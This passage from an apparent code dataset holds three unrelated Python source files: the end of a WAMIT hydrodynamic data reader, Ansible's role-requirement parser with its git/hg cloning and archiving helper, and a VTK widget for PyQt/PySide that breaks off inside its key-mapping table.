                        # when a .3fk file exists without a .3sc file. Confirm
                        # the intent is `fk[line_count][1]`.
                        wave_dir_hold = scattering[line_count][1]
                        line_count += 1
        else:
            print '\tThe file ' + self.files['3fk'] + ' does not exist... not reading froud krylof coefficients.'

        # --- Assemble one HydrodynamicData object per body ---
        for i in xrange(num_bodies):
            self.body[i] = bem.HydrodynamicData()
            self.body[i].scaled = self.scaled
            self.body[i].g = self.g
            self.body[i].rho = self.rho
            self.body[i].body_num = i
            self.body[i].name = name[i][0:-4]  # strip the file extension
            self.body[i].water_depth = water_depth
            self.body[i].num_bodies = num_bodies
            self.body[i].cg = cg[i]
            self.body[i].cb = cb[i]
            self.body[i].k = k[i]
            self.body[i].disp_vol = disp_vol[i]
            self.body[i].wave_dir = wave_dir
            self.body[i].T = T
            self.body[i].w = 2.0*np.pi/self.body[i].T

            # Each coefficient set is sliced out of the stacked 6N x 6N
            # arrays; a NaN placeholder plus warning is used when a section
            # was absent from the .out file.
            if 'am_inf' in locals():
                self.body[i].am.inf = am_inf[6*i:6+6*i,:]
            else:
                self.body[i].am.inf = np.nan*np.zeros([6*num_bodies,6*num_bodies,self.body[i].T.size])
                print 'Warning: body ' + str(i) + ' - The WAMTI .out file specified does not contain infinite frequency added mass coefficients'

            if 'am_zero' in locals():
                self.body[i].am.zero = am_zero[6*i:6+6*i,:]
            else:
                self.body[i].am.zero = np.nan*np.zeros([6*num_bodies,6*num_bodies,self.body[i].T.size])
                print 'Warning: body ' + str(i) + ' - The WAMTI .out file specified does not contain zero frequency added mass coefficients'

            if 'am_all' in locals():
                self.body[i].am.all = am_all[6*i:6+6*i,:,:]
            else:
                self.body[i].am.all = np.nan*np.zeros([6*num_bodies,6*num_bodies,self.body[i].T.size])
                print 'Warning: body ' + str(i) + ' - The WAMTI .out file specified does not contain any frequency dependent added mass coefficients'

            if 'rd_all' in locals():
                self.body[i].rd.all = rd_all[6*i:6+6*i,:,:]
            else:
                self.body[i].rd.all = np.nan*np.zeros([6*num_bodies,6*num_bodies,self.body[i].T.size])
                print 'Warning: body ' + str(i) + ' - The WAMTI .out file specified does not contain any frequency dependent radiation damping coefficients'

            if 'ex_all' in locals():
                self.body[i].ex.mag = ex_all[6*i:6+6*i,:,:]
                self.body[i].ex.phase = np.deg2rad(phase_all[6*i:6+6*i,:,:])
                self.body[i].ex.re = self.body[i].ex.mag*np.cos(self.body[i].ex.phase)
                self.body[i].ex.im = self.body[i].ex.mag*np.sin(self.body[i].ex.phase)
            else:
                print 'Warning: body ' + str(i) + ' - The WAMTI .out file specified does not contain any excitation coefficients'

            if 'sc_mag' in locals():
                self.body[i].ex.sc.mag = sc_mag[6*i:6+6*i,:,:]
                self.body[i].ex.sc.phase = np.deg2rad(sc_phase[6*i:6+6*i,:,:])
                self.body[i].ex.sc.re = sc_re[6*i:6+6*i,:,:]
                self.body[i].ex.sc.im = sc_im[6*i:6+6*i,:,:]
            else:
                pass
                # print 'Warning: body ' + str(i) + ' - The WAMTI .3sc file specified does not contain any scattering coefficients'

            if 'fk_mag' in locals():
                self.body[i].ex.fk.mag = fk_mag[6*i:6+6*i,:,:]
                self.body[i].ex.fk.phase = np.deg2rad(fk_phase[6*i:6+6*i,:,:])
                self.body[i].ex.fk.re = fk_re[6*i:6+6*i,:,:]
                self.body[i].ex.fk.im = fk_im[6*i:6+6*i,:,:]
            else:
                pass
                # print 'Warning: body ' + str(i) + ' - The WAMTI .3fk file specified does not contain any froude krylof coefficients'

            if 'rao_all' in locals():
                # NOTE(review): re/im are derived from phase_all (the
                # diffraction phases), not rao_phase_all -- confirm intent.
                self.body[i].rao.mag = rao_all[6*i:6+6*i,:,:]
                self.body[i].rao.phase = np.deg2rad(phase_all[6*i:6+6*i,:,:])
                self.body[i].rao.re = self.body[i].rao.mag*np.cos(self.body[i].rao.phase)
                self.body[i].rao.im = self.body[i].rao.mag*np.sin(self.body[i].rao.phase)
            else:
                print 'Warning: body ' + str(i) + ' - The WAMTI .out file specified does not contain any rao data'

            if 'ssy_all' in locals():
                self.body[i].ssy.mag = ssy_all[6*i:6+6*i,:,:]
                self.body[i].ssy.phase = np.deg2rad(phase_all[6*i:6+6*i,:,:])
                self.body[i].ssy.re = self.body[i].ssy.mag*np.cos(self.body[i].ssy.phase)
                self.body[i].ssy.im = self.body[i].ssy.mag*np.sin(self.body[i].ssy.phase)
            else:
                print 'Warning: body ' + str(i) + ' - The WAMTI .out file specified does not contain any rao data'

            self.body[i].bem_raw_data = raw
            self.body[i].bem_code = code

            # Apply dimensionalisation now if requested at construction time.
            self.body[i].scale(scale=self.scaled_at_read)
def read(out_file, density=1000., gravity=9.81, scale=False):
    '''
    Function to read WAMIT data into a data object of type(WamitOutput)

    Parameters:
        out_file : str
            Name of the wamit .out output file. In order to read scattering
            and Froude-Krylov forces the .3sc (scattering) and .3fk
            (Froude-Krylov) coefficient files must have the same base name
            as the .out file.
        density : float, optional
            Water density used to scale the hydrodynamic coefficient data
        gravity : float, optional
            Acceleration due to gravity used to scale the hydrodynamic
            coefficient data
        scale : bool, optional
            Boolean value to determine if the hydrodynamic data is scaled.
            See the bemio.data_structures.bem.scale function for more
            information

    Returns:
        wamit_data
            A WamitOutput object that contains the data from the WAMIT .out
            file specified

    Examples:
        The following example assumes there is a WAMIT output file named
        `wamit.out`

        >>> wamit_data = read(out_file=wamit.out)
    '''
    # Thin convenience wrapper around the WamitOutput constructor.
    return WamitOutput(out_file, density, gravity, scale)
|
NREL/OpenWARP
|
source/automated_test/bemio/io/wamit.py
|
Python
|
apache-2.0
| 21,188
|
[
"exciting"
] |
5439f79f336abf90cf4edddaad7d7e43d37952a40c4a49e58a63c224a664ccd3
|
# (c) 2014 Michael DeHaan, <michael@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from six import string_types
import os
import shutil
import subprocess
import tempfile
from ansible.errors import AnsibleError
from ansible.playbook.role.definition import RoleDefinition
__all__ = ['RoleRequirement']
# Keys retained when normalizing a role spec dict; any other keys are
# stripped out by RoleRequirement.role_yaml_parse().
VALID_SPEC_KEYS = [
    'name',
    'role',
    'scm',
    'src',
    'version',
]
class RoleRequirement(RoleDefinition):
    """
    Parses role requirement specs (plain role names, "src,version,name"
    strings, requirements.yml entries, and SCM URLs) into normalized dicts.

    FIXME: document various ways role specs can be specified
    """

    def __init__(self):
        pass

    @staticmethod
    def repo_url_to_role_name(repo_url):
        # gets the role name out of a repo like
        # http://git.example.com/repos/repo.git" => "repo"
        if '://' not in repo_url and '@' not in repo_url:
            # Not a URL at all (e.g. a plain galaxy role name) - use as-is.
            return repo_url
        trailing_path = repo_url.split('/')[-1]
        if trailing_path.endswith('.git'):
            trailing_path = trailing_path[:-4]
        if trailing_path.endswith('.tar.gz'):
            trailing_path = trailing_path[:-7]
        if ',' in trailing_path:
            # Strip a trailing ",version[,name]" suffix.
            trailing_path = trailing_path.split(',')[0]
        return trailing_path

    @staticmethod
    def role_spec_parse(role_spec):
        # takes a repo and a version like
        # git+http://git.example.com/repos/repo.git,v1.0
        # and returns a dict of properties such as:
        # {
        #   'scm': 'git',
        #   'src': 'http://git.example.com/repos/repo.git',
        #   'version': 'v1.0',
        #   'name': 'repo'
        # }
        default_role_versions = dict(git='master', hg='tip')

        role_spec = role_spec.strip()
        role_version = ''
        if role_spec == "" or role_spec.startswith("#"):
            # NOTE(review): empty/comment lines return a 4-tuple rather than
            # a dict; callers appear to rely on this inconsistency, so it is
            # deliberately preserved.
            return (None, None, None, None)

        tokens = [s.strip() for s in role_spec.split(',')]

        # assume https://github.com URLs are git+https:// URLs and not
        # tarballs unless they end in '.zip'
        if 'github.com/' in tokens[0] and not tokens[0].startswith("git+") and not tokens[0].endswith('.tar.gz'):
            tokens[0] = 'git+' + tokens[0]

        if '+' in tokens[0]:
            (scm, role_url) = tokens[0].split('+')
        else:
            scm = None
            role_url = tokens[0]

        if len(tokens) >= 2:
            role_version = tokens[1]

        if len(tokens) == 3:
            role_name = tokens[2]
        else:
            role_name = RoleRequirement.repo_url_to_role_name(tokens[0])

        if scm and not role_version:
            # No explicit version: fall back to the SCM's default branch/rev.
            role_version = default_role_versions.get(scm, '')

        return dict(scm=scm, src=role_url, version=role_version, name=role_name)

    @staticmethod
    def role_yaml_parse(role):
        """
        Normalize a requirements.yml entry (string or dict) into a dict
        containing only the keys listed in VALID_SPEC_KEYS.
        """
        if isinstance(role, string_types):
            name = None
            scm = None
            src = None
            version = None
            if ',' in role:
                if role.count(',') == 1:
                    (src, version) = role.strip().split(',', 1)
                elif role.count(',') == 2:
                    (src, version, name) = role.strip().split(',', 2)
                else:
                    raise AnsibleError("Invalid role line (%s). Proper format is 'role_name[,version[,name]]'" % role)
            else:
                src = role
            if name is None:
                name = RoleRequirement.repo_url_to_role_name(src)
            if '+' in src:
                (scm, src) = src.split('+', 1)
            return dict(name=name, src=src, scm=scm, version=version)

        if 'role' in role:
            # Old style: {role: "galaxy.role,version,name", other_vars: "here" }
            role = RoleRequirement.role_spec_parse(role['role'])
        else:
            role = role.copy()
            # New style: { src: 'galaxy.role,version,name', other_vars: "here" }
            if 'github.com' in role["src"] and 'http' in role["src"] and '+' not in role["src"] and not role["src"].endswith('.tar.gz'):
                role["src"] = "git+" + role["src"]
            if '+' in role["src"]:
                (scm, src) = role["src"].split('+')
                role["scm"] = scm
                role["src"] = src
            if 'name' not in role:
                role["name"] = RoleRequirement.repo_url_to_role_name(role["src"])
            if 'version' not in role:
                role['version'] = ''
            if 'scm' not in role:
                role['scm'] = None

        # Bug fix: iterate over a snapshot of the keys. Popping entries while
        # iterating the live keys() view raises RuntimeError on Python 3.
        for key in list(role.keys()):
            if key not in VALID_SPEC_KEYS:
                role.pop(key)

        return role

    @staticmethod
    def scm_archive_role(src, scm='git', name=None, version='HEAD'):
        """
        Clone a role from an SCM (git or hg) and archive it into a temporary
        tar file. Returns the tar file's path; the caller must remove it.
        """
        if scm not in ['hg', 'git']:
            raise AnsibleError("- scm %s is not currently supported" % scm)
        tempdir = tempfile.mkdtemp()
        clone_cmd = [scm, 'clone', src, name]
        with open('/dev/null', 'w') as devnull:
            try:
                popen = subprocess.Popen(clone_cmd, cwd=tempdir, stdout=devnull, stderr=devnull)
            except Exception:
                # Narrowed from a bare "except:" so KeyboardInterrupt and
                # SystemExit are not swallowed into an AnsibleError.
                raise AnsibleError("error executing: %s" % " ".join(clone_cmd))
            rc = popen.wait()
        if rc != 0:
            raise AnsibleError("- command %s failed in directory %s (rc=%s)" % (' '.join(clone_cmd), tempdir, rc))

        temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.tar')
        if scm == 'hg':
            archive_cmd = ['hg', 'archive', '--prefix', "%s/" % name]
            if version:
                archive_cmd.extend(['-r', version])
            archive_cmd.append(temp_file.name)
        if scm == 'git':
            archive_cmd = ['git', 'archive', '--prefix=%s/' % name, '--output=%s' % temp_file.name]
            if version:
                archive_cmd.append(version)
            else:
                archive_cmd.append('HEAD')

        with open('/dev/null', 'w') as devnull:
            popen = subprocess.Popen(archive_cmd, cwd=os.path.join(tempdir, name),
                                     stderr=devnull, stdout=devnull)
            rc = popen.wait()
        if rc != 0:
            raise AnsibleError("- command %s failed in directory %s (rc=%s)" % (' '.join(archive_cmd), tempdir, rc))

        shutil.rmtree(tempdir, ignore_errors=True)
        return temp_file.name
|
shawnsi/ansible
|
lib/ansible/playbook/role/requirement.py
|
Python
|
gpl-3.0
| 6,986
|
[
"Galaxy"
] |
3c4895e31a4a673940fc59e27ee8f1070f7d2ca16bcba4569a880f8fe95118fb
|
"""
A simple VTK widget for PyQt or PySide.
See http://www.trolltech.com for Qt documentation,
http://www.riverbankcomputing.co.uk for PyQt, and
http://pyside.github.io for PySide.
This class is based on the vtkGenericRenderWindowInteractor and is
therefore fairly powerful. It should also play nicely with the
vtk3DWidget code.
Created by Prabhu Ramachandran, May 2002
Based on David Gobbi's QVTKRenderWidget.py
Changes by Gerard Vermeulen Feb. 2003
Win32 support.
Changes by Gerard Vermeulen, May 2003
Bug fixes and better integration with the Qt framework.
Changes by Phil Thompson, Nov. 2006
Ported to PyQt v4.
Added support for wheel events.
Changes by Phil Thompson, Oct. 2007
Bug fixes.
Changes by Phil Thompson, Mar. 2008
Added cursor support.
Changes by Rodrigo Mologni, Sep. 2013 (Credit to Daniele Esposti)
Bug fix to PySide: Converts PyCObject to void pointer.
Changes by Greg Schussman, Aug. 2014
The keyPressEvent function now passes keysym instead of None.
Changes by Alex Tsui, Apr. 2015
Port from PyQt4 to PyQt5.
Changes by Fabian Wenzel, Jan. 2016
Support for Python3
"""
# Check whether a specific PyQt implementation was chosen
try:
    import vtk.qt
    PyQtImpl = vtk.qt.PyQtImpl
except ImportError:
    # Bug fix: PyQtImpl must be bound even when vtk.qt is unavailable;
    # the original "pass" left it undefined, so the "if PyQtImpl is None"
    # test below raised NameError instead of autodetecting.
    PyQtImpl = None
if PyQtImpl is None:
    # Autodetect the PyQt implementation to use
    try:
        import PyQt5
        PyQtImpl = "PyQt5"
    except ImportError:
        try:
            import PyQt4
            PyQtImpl = "PyQt4"
        except ImportError:
            try:
                import PySide
                PyQtImpl = "PySide"
            except ImportError:
                raise ImportError("Cannot load either PyQt or PySide")
if PyQtImpl == "PyQt5":
    from PyQt5.QtWidgets import QWidget
    from PyQt5.QtWidgets import QSizePolicy
    from PyQt5.QtWidgets import QApplication
    from PyQt5.QtCore import Qt
    from PyQt5.QtCore import QTimer
    from PyQt5.QtCore import QObject
    from PyQt5.QtCore import QSize
    from PyQt5.QtCore import QEvent
    from PyQt5 import QtOpenGL
elif PyQtImpl == "PyQt4":
    from PyQt4.QtGui import QWidget
    from PyQt4.QtGui import QSizePolicy
    from PyQt4.QtGui import QApplication
    from PyQt4.QtCore import Qt
    from PyQt4.QtCore import QTimer
    from PyQt4.QtCore import QObject
    from PyQt4.QtCore import QSize
    from PyQt4.QtCore import QEvent
    from PyQt4 import QtOpenGL
elif PyQtImpl == "PySide":
    from PySide.QtGui import QWidget
    from PySide.QtGui import QSizePolicy
    from PySide.QtGui import QApplication
    from PySide.QtCore import Qt
    from PySide.QtCore import QTimer
    from PySide.QtCore import QObject
    from PySide.QtCore import QSize
    from PySide.QtCore import QEvent
    # Bug fix: QtOpenGL was missing from the PySide branch, which made the
    # VTKQGLWidget class definition below fail with NameError under PySide.
    from PySide import QtOpenGL
else:
    raise ImportError("Unknown PyQt implementation " + repr(PyQtImpl))
class VTKQGLWidget(QtOpenGL.QGLWidget):
    """ A QGLVTKWidget for Python and Qt.  Uses a
    vtkGenericRenderWindowInteractor to handle the interactions.  Use
    GetRenderWindow() to get the vtkRenderWindow.  Create with the
    keyword stereo=1 in order to generate a stereo-capable window.
    The user interface is summarized in vtkInteractorStyle.h:
    - Keypress j / Keypress t: toggle between joystick (position
    sensitive) and trackball (motion sensitive) styles. In joystick
    style, motion occurs continuously as long as a mouse button is
    pressed. In trackball style, motion occurs when the mouse button
    is pressed and the mouse pointer moves.
    - Keypress c / Keypress o: toggle between camera and object
    (actor) modes. In camera mode, mouse events affect the camera
    position and focal point. In object mode, mouse events affect
    the actor that is under the mouse pointer.
    - Button 1: rotate the camera around its focal point (if camera
    mode) or rotate the actor around its origin (if actor mode). The
    rotation is in the direction defined from the center of the
    renderer's viewport towards the mouse position. In joystick mode,
    the magnitude of the rotation is determined by the distance the
    mouse is from the center of the render window.
    - Button 2: pan the camera (if camera mode) or translate the actor
    (if object mode). In joystick mode, the direction of pan or
    translation is from the center of the viewport towards the mouse
    position. In trackball mode, the direction of motion is the
    direction the mouse moves. (Note: with 2-button mice, pan is
    defined as <Shift>-Button 1.)
    - Button 3: zoom the camera (if camera mode) or scale the actor
    (if object mode). Zoom in/increase scale if the mouse position is
    in the top half of the viewport; zoom out/decrease scale if the
    mouse position is in the bottom half. In joystick mode, the amount
    of zoom is controlled by the distance of the mouse pointer from
    the horizontal centerline of the window.
    - Keypress 3: toggle the render window into and out of stereo
    mode. By default, red-blue stereo pairs are created. Some systems
    support Crystal Eyes LCD stereo glasses; you have to invoke
    SetStereoTypeToCrystalEyes() on the rendering window. Note: to
    use stereo you also need to pass a stereo=1 keyword argument to
    the constructor.
    - Keypress e: exit the application.
    - Keypress f: fly to the picked point
    - Keypress p: perform a pick operation. The render window interactor
    has an internal instance of vtkCellPicker that it uses to pick.
    - Keypress r: reset the camera view along the current view
    direction. Centers the actors and moves the camera so that all actors
    are visible.
    - Keypress s: modify the representation of all actors so that they
    are surfaces.
    - Keypress u: invoke the user-defined function. Typically, this
    keypress will bring up an interactor that you can type commands in.
    - Keypress w: modify the representation of all actors so that they
    are wireframe.
    """

    # Map between VTK and Qt cursors.
    _CURSOR_MAP = {
        0:  Qt.ArrowCursor,          # VTK_CURSOR_DEFAULT
        1:  Qt.ArrowCursor,          # VTK_CURSOR_ARROW
        2:  Qt.SizeBDiagCursor,      # VTK_CURSOR_SIZENE
        3:  Qt.SizeFDiagCursor,      # VTK_CURSOR_SIZENWSE
        4:  Qt.SizeBDiagCursor,      # VTK_CURSOR_SIZESW
        5:  Qt.SizeFDiagCursor,      # VTK_CURSOR_SIZESE
        6:  Qt.SizeVerCursor,        # VTK_CURSOR_SIZENS
        7:  Qt.SizeHorCursor,        # VTK_CURSOR_SIZEWE
        8:  Qt.SizeAllCursor,        # VTK_CURSOR_SIZEALL
        9:  Qt.PointingHandCursor,   # VTK_CURSOR_HAND
        10: Qt.CrossCursor,          # VTK_CURSOR_CROSSHAIR
    }

    def __init__(self, parent=None, wflags=Qt.WindowFlags()):
        """Create the GL widget, its VTK render window/interactor/renderer,
        and wire up the Qt <-> VTK event plumbing."""
        # the current button
        self._ActiveButton = Qt.NoButton
        # private attributes
        self.__saveX = 0
        self.__saveY = 0
        self.__saveModifiers = Qt.NoModifier
        self.__saveButtons = Qt.NoButton
        # create qt-level widget
        #QtOpenGL.QGLWidget.__init__(self, parent, wflags|Qt.MSWindowsOwnDC)
        glFormat = QtOpenGL.QGLFormat()
        glFormat.setAlpha(True)
        QtOpenGL.QGLWidget.__init__(self, glFormat, parent)
        WId = self.winId()
        # Python2
        if type(WId).__name__ == 'PyCObject':
            from ctypes import pythonapi, c_void_p, py_object
            pythonapi.PyCObject_AsVoidPtr.restype = c_void_p
            pythonapi.PyCObject_AsVoidPtr.argtypes = [py_object]
            WId = pythonapi.PyCObject_AsVoidPtr(WId)
        # Python3
        elif type(WId).__name__ == 'PyCapsule':
            from ctypes import pythonapi, c_void_p, py_object, c_char_p
            pythonapi.PyCapsule_GetName.restype = c_char_p
            pythonapi.PyCapsule_GetName.argtypes = [py_object]
            name = pythonapi.PyCapsule_GetName(WId)
            pythonapi.PyCapsule_GetPointer.restype = c_void_p
            pythonapi.PyCapsule_GetPointer.argtypes = [py_object, c_char_p]
            WId = pythonapi.PyCapsule_GetPointer(WId, name)
        # Create the render window
        self.__RenderWindow = vtk.vtkRenderWindow()
        self.__RenderWindow.SetWindowInfo(str(int(WId)))
        # Create the render window interactor
        self.__Iren = vtk.vtkGenericRenderWindowInteractor()
        self.__Iren.SetRenderWindow(self.__RenderWindow)
        # Add a renderer
        self.__Renderer = vtk.vtkRenderer()
        self.__RenderWindow.AddRenderer(self.__Renderer)
        # do all the necessary qt setup
        self.setAttribute(Qt.WA_OpaquePaintEvent)
        self.setAttribute(Qt.WA_PaintOnScreen)
        self.setMouseTracking(True) # get all mouse events
        self.setFocusPolicy(Qt.WheelFocus)
        self.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding))
        self._Timer = QTimer(self)
        self._Timer.timeout.connect(self.TimerEvent)
        self.__Iren.SetInteractorStyle(vtk.vtkInteractorStyleTrackballCamera())
        self.__Iren.AddObserver('CreateTimerEvent', self.CreateTimer)
        self.__Iren.AddObserver('DestroyTimerEvent', self.DestroyTimer)
        self.__Iren.GetRenderWindow().AddObserver('CursorChangedEvent',
                                                  self.CursorChangedEvent)
        #Create a hidden child widget and connect its destroyed signal to its
        #parent ``Finalize`` slot. The hidden children will be destroyed before
        #its parent thus allowing cleanup of VTK elements.
        self._hidden = QWidget(self)
        self._hidden.hide()
        self._hidden.destroyed.connect(self.Finalize)
        # Do it here to be ready (added by Papazov)
        self.Initialize()

    def enable_depthpeeling(self, max_num_of_peels = 4):
        """Configure the render window and renderer for depth peeling
        (order-independent transparency)."""
        # 1. Use a render window with alpha bits (as initial value is 0 (false)):
        self.__RenderWindow.SetAlphaBitPlanes(True)
        # 2. Force to not pick a framebuffer with a multisample buffer
        #    (as initial value is 8):
        self.__RenderWindow.SetMultiSamples(0)
        # 3. Choose to use depth peeling (if supported) (initial value is 0 (false)):
        self.__Renderer.SetUseDepthPeeling(True)
        # 4. Set depth peeling parameters
        # - Set the maximum number of rendering passes (initial value is 4):
        self.__Renderer.SetMaximumNumberOfPeels(max_num_of_peels)
        # - Set the occlusion ratio (initial value is 0.0, exact image):
        self.__Renderer.SetOcclusionRatio(0.0)

    def __getattr__(self, attr):
        """Makes the object behave like a vtkGenericRenderWindowInteractor"""
        if attr == '__vtk__':
            return lambda t=self.__Iren: t
        elif hasattr(self.__Iren, attr):
            return getattr(self.__Iren, attr)
        else:
            raise AttributeError(self.__class__.__name__ +
                  " has no attribute named " + attr)

    def Finalize(self):
        '''
        Call internal cleanup method on VTK objects
        '''
        self.__RenderWindow.Finalize()

    def CreateTimer(self, obj, evt):
        # VTK asked for a repeating timer; drive it at ~100 Hz.
        self._Timer.start(10)

    def DestroyTimer(self, obj, evt):
        self._Timer.stop()
        return 1

    def TimerEvent(self):
        self.__Iren.TimerEvent()

    def CursorChangedEvent(self, obj, evt):
        """Called when the CursorChangedEvent fires on the render window."""
        # This indirection is needed since when the event fires, the current
        # cursor is not yet set so we defer this by which time the current
        # cursor should have been set.
        QTimer.singleShot(0, self.ShowCursor)

    def HideCursor(self):
        """Hides the cursor."""
        self.setCursor(Qt.BlankCursor)

    def ShowCursor(self):
        """Shows the cursor."""
        vtk_cursor = self.__Iren.GetRenderWindow().GetCurrentCursor()
        qt_cursor = self._CURSOR_MAP.get(vtk_cursor, Qt.ArrowCursor)
        self.setCursor(qt_cursor)

    def closeEvent(self, evt):
        self.Finalize()

    def sizeHint(self):
        return QSize(400, 400)

    def paintEngine(self):
        # VTK paints directly on screen; tell Qt not to use a paint engine.
        return None

    def paintEvent(self, ev):
        self.__Iren.Render()

    def resizeEvent(self, ev):
        """Propagate the new widget size to the VTK render window."""
        w = self.width()
        h = self.height()
        vtk.vtkRenderWindow.SetSize(self.__RenderWindow, w, h)
        self.__Iren.SetSize(w, h)
        self.__Iren.ConfigureEvent()
        self.update()

    def _GetCtrlShift(self, ev):
        """Return (ctrl, shift) modifier flags for the given Qt event,
        falling back to the last saved modifiers when the event has none."""
        ctrl = shift = False
        if hasattr(ev, 'modifiers'):
            if ev.modifiers() & Qt.ShiftModifier:
                shift = True
            if ev.modifiers() & Qt.ControlModifier:
                ctrl = True
        else:
            if self.__saveModifiers & Qt.ShiftModifier:
                shift = True
            if self.__saveModifiers & Qt.ControlModifier:
                ctrl = True
        return ctrl, shift

    def enterEvent(self, ev):
        ctrl, shift = self._GetCtrlShift(ev)
        self.__Iren.SetEventInformationFlipY(self.__saveX, self.__saveY,
                                             ctrl, shift, chr(0), 0, None)
        self.__Iren.EnterEvent()

    def leaveEvent(self, ev):
        ctrl, shift = self._GetCtrlShift(ev)
        self.__Iren.SetEventInformationFlipY(self.__saveX, self.__saveY,
                                             ctrl, shift, chr(0), 0, None)
        self.__Iren.LeaveEvent()

    def mousePressEvent(self, ev):
        ctrl, shift = self._GetCtrlShift(ev)
        repeat = 0
        if ev.type() == QEvent.MouseButtonDblClick:
            repeat = 1
        self.__Iren.SetEventInformationFlipY(ev.x(), ev.y(),
                                             ctrl, shift, chr(0), repeat, None)
        self._ActiveButton = ev.button()
        if self._ActiveButton == Qt.LeftButton:
            self.__Iren.LeftButtonPressEvent()
        elif self._ActiveButton == Qt.RightButton:
            self.__Iren.RightButtonPressEvent()
        elif self._ActiveButton == Qt.MidButton:
            self.__Iren.MiddleButtonPressEvent()

    def mouseReleaseEvent(self, ev):
        ctrl, shift = self._GetCtrlShift(ev)
        self.__Iren.SetEventInformationFlipY(ev.x(), ev.y(),
                                             ctrl, shift, chr(0), 0, None)
        if self._ActiveButton == Qt.LeftButton:
            self.__Iren.LeftButtonReleaseEvent()
        elif self._ActiveButton == Qt.RightButton:
            self.__Iren.RightButtonReleaseEvent()
        elif self._ActiveButton == Qt.MidButton:
            self.__Iren.MiddleButtonReleaseEvent()

    def mouseMoveEvent(self, ev):
        # Remember position/modifiers for events that lack them
        # (enter/leave/key events).
        self.__saveModifiers = ev.modifiers()
        self.__saveButtons = ev.buttons()
        self.__saveX = ev.x()
        self.__saveY = ev.y()
        ctrl, shift = self._GetCtrlShift(ev)
        self.__Iren.SetEventInformationFlipY(ev.x(), ev.y(),
                                             ctrl, shift, chr(0), 0, None)
        self.__Iren.MouseMoveEvent()

    def keyPressEvent(self, ev):
        ctrl, shift = self._GetCtrlShift(ev)
        if ev.key() < 256:
            key = str(ev.text())
        else:
            key = chr(0)
        keySym = _qt_key_to_key_sym(ev.key())
        # Bug fix: _qt_key_to_key_sym returns None for unmapped keys, so the
        # original "len(keySym)" raised TypeError for e.g. Shift+<unmapped>.
        if keySym is not None and shift and len(keySym) == 1 and keySym.isalpha():
            keySym = keySym.upper()
        self.__Iren.SetEventInformationFlipY(self.__saveX, self.__saveY,
                                             ctrl, shift, key, 0, keySym)
        self.__Iren.KeyPressEvent()
        self.__Iren.CharEvent()

    def keyReleaseEvent(self, ev):
        ctrl, shift = self._GetCtrlShift(ev)
        if ev.key() < 256:
            key = chr(ev.key())
        else:
            key = chr(0)
        self.__Iren.SetEventInformationFlipY(self.__saveX, self.__saveY,
                                             ctrl, shift, key, 0, None)
        self.__Iren.KeyReleaseEvent()

    def wheelEvent(self, ev):
        # NOTE(review): angleDelta() is the Qt5 API; under PyQt4/PySide the
        # wheel event exposes delta() instead - confirm if Qt4 support is
        # still required.
        if ev.angleDelta().y() >= 0: # Change
            self.__Iren.MouseWheelForwardEvent()
        else:
            self.__Iren.MouseWheelBackwardEvent()

    @property
    def interactor(self):
        return self.__Iren

    @property
    def render_window_interactor(self):
        return self.__Iren

    @property
    def render_window(self):
        return self.__RenderWindow

    @property
    def renderer(self):
        return self.__Renderer

    def Render(self):
        self.update()
# Translation table from Qt key codes to VTK keysym strings, mirroring the
# C++ table in GUISupport/Qt/QVTKInteractorAdapter.cxx. Keys absent from
# this table have no VTK equivalent (see _qt_key_to_key_sym below).
_keysyms = {
    Qt.Key_Backspace: 'BackSpace',
    Qt.Key_Tab: 'Tab',
    Qt.Key_Backtab: 'Tab',
    # Qt.Key_Clear : 'Clear',
    Qt.Key_Return: 'Return',
    Qt.Key_Enter: 'Return',
    Qt.Key_Shift: 'Shift_L',
    Qt.Key_Control: 'Control_L',
    Qt.Key_Alt: 'Alt_L',
    Qt.Key_Pause: 'Pause',
    Qt.Key_CapsLock: 'Caps_Lock',
    Qt.Key_Escape: 'Escape',
    Qt.Key_Space: 'space',
    # Qt.Key_Prior : 'Prior',
    # Qt.Key_Next : 'Next',
    Qt.Key_End: 'End',
    Qt.Key_Home: 'Home',
    Qt.Key_Left: 'Left',
    Qt.Key_Up: 'Up',
    Qt.Key_Right: 'Right',
    Qt.Key_Down: 'Down',
    Qt.Key_SysReq: 'Snapshot',
    Qt.Key_Insert: 'Insert',
    Qt.Key_Delete: 'Delete',
    Qt.Key_Help: 'Help',
    Qt.Key_0: '0',
    Qt.Key_1: '1',
    Qt.Key_2: '2',
    Qt.Key_3: '3',
    Qt.Key_4: '4',
    Qt.Key_5: '5',
    Qt.Key_6: '6',
    Qt.Key_7: '7',
    Qt.Key_8: '8',
    Qt.Key_9: '9',
    Qt.Key_A: 'a',
    Qt.Key_B: 'b',
    Qt.Key_C: 'c',
    Qt.Key_D: 'd',
    Qt.Key_E: 'e',
    Qt.Key_F: 'f',
    Qt.Key_G: 'g',
    Qt.Key_H: 'h',
    Qt.Key_I: 'i',
    Qt.Key_J: 'j',
    Qt.Key_K: 'k',
    Qt.Key_L: 'l',
    Qt.Key_M: 'm',
    Qt.Key_N: 'n',
    Qt.Key_O: 'o',
    Qt.Key_P: 'p',
    Qt.Key_Q: 'q',
    Qt.Key_R: 'r',
    Qt.Key_S: 's',
    Qt.Key_T: 't',
    Qt.Key_U: 'u',
    Qt.Key_V: 'v',
    Qt.Key_W: 'w',
    Qt.Key_X: 'x',
    Qt.Key_Y: 'y',
    Qt.Key_Z: 'z',
    Qt.Key_Asterisk: 'asterisk',
    Qt.Key_Plus: 'plus',
    Qt.Key_Minus: 'minus',
    Qt.Key_Period: 'period',
    Qt.Key_Slash: 'slash',
    Qt.Key_F1: 'F1',
    Qt.Key_F2: 'F2',
    Qt.Key_F3: 'F3',
    Qt.Key_F4: 'F4',
    Qt.Key_F5: 'F5',
    Qt.Key_F6: 'F6',
    Qt.Key_F7: 'F7',
    Qt.Key_F8: 'F8',
    Qt.Key_F9: 'F9',
    Qt.Key_F10: 'F10',
    Qt.Key_F11: 'F11',
    Qt.Key_F12: 'F12',
    Qt.Key_F13: 'F13',
